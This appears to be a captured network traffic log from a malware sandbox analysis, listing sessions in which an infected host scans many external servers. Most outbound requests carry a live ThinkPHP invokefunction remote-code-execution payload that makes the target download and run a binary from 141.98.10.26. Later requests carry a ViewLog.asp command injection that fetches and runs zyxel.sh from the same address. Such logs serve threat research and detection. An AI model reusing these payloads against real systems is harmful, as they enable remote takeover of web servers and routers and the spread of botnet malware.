Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c17a7b5c.1700638738.dc9895c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
430	192.168.2.23	42606	95.170.72.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.076211929 CET	8306	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.288546085 CET	8314	IN	HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
431	192.168.2.23	53112	95.130.227.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.172584057 CET	8308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.484464884 CET	8327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:58 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
432	192.168.2.23	35672	95.181.228.47	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.229441881 CET	8312	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.587112904 CET	8354	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Wed, 22 Nov 2023 07:38:58 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
433	192.168.2.23	58872	95.101.1.76	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.769211054 CET	8356	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.946296930 CET	8371	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:58 GMT Date: Wed, 22 Nov 2023 07:38:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 38 26 23 34 36 3b 31 61 39 63 30 33 66 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95b0f748.1700638738.1a9c03f0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
434	192.168.2.23	39866	95.100.77.205	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.776242018 CET	8357	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.960869074 CET	8426	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:58 GMT Date: Wed, 22 Nov 2023 07:38:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 30 36 33 38 37 33 38 26 23 34 36 3b 32 66 30 30 31 34 36 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.af7a7b5c.1700638738.2f001466</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
435	192.168.2.23	51076	95.216.103.91	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.787916899 CET	8357	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:58.983123064 CET	8434	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:58 GMT Server: Apache/2.4.25 (Debian) Content-Length: 333 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 67 2d 70 72 69 63 65 2e 73 79 73 74 65 6d 2d 69 6e 74 65 67 72 61 74 69 6f 6e 2e 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at ag-price.system-integration.international Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
436	192.168.2.23	43538	95.244.239.228	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.788367987 CET	8358	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
437	192.168.2.23	59198	95.101.16.165	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.795038939 CET	8359	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
438	192.168.2.23	47398	95.214.59.197	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.796444893 CET	8359	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:59.000572920 CET	8436	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:58 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
439	192.168.2.23	38012	95.110.164.138	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.798649073 CET	8360	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:59.004575968 CET	8437	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:55 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
440	192.168.2.23	35898	95.43.244.23	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:58.810096025 CET	8361	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:59.027982950 CET	8438	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:56 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12 Content-Length: 326 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 70 20 50 48 50 2f 38 2e 31 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.1.12 Server at localhost Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
441	192.168.2.23	46694	95.82.50.186	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.115562916 CET	8441	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:00.905966997 CET	8679	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:03.177639961 CET	8930	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:07.529074907 CET	9505	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:15.975951910 CET	10473	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:34.149329901 CET	12634	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:08.960457087 CET	16778	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
442	192.168.2.23	60362	62.165.75.6	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.144491911 CET	8442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.322855949 CET	8472	IN	HTTP/1.1 500 Internal Server Error Server: openresty Date: Wed, 22 Nov 2023 07:38:59 GMT Content-Type: text/html Content-Length: 249958 Connection: close ETag: "64d28893-3d066"

Session ID	Source IP	Source Port	Destination IP	Destination Port
443	192.168.2.23	38532	31.200.43.100	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.190946102 CET	8445	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
444	192.168.2.23	36998	94.122.73.32	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.193872929 CET	8446	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
445	192.168.2.23	47538	31.200.63.57	8080

Timestamp	kBytes transferred	Direction	Data
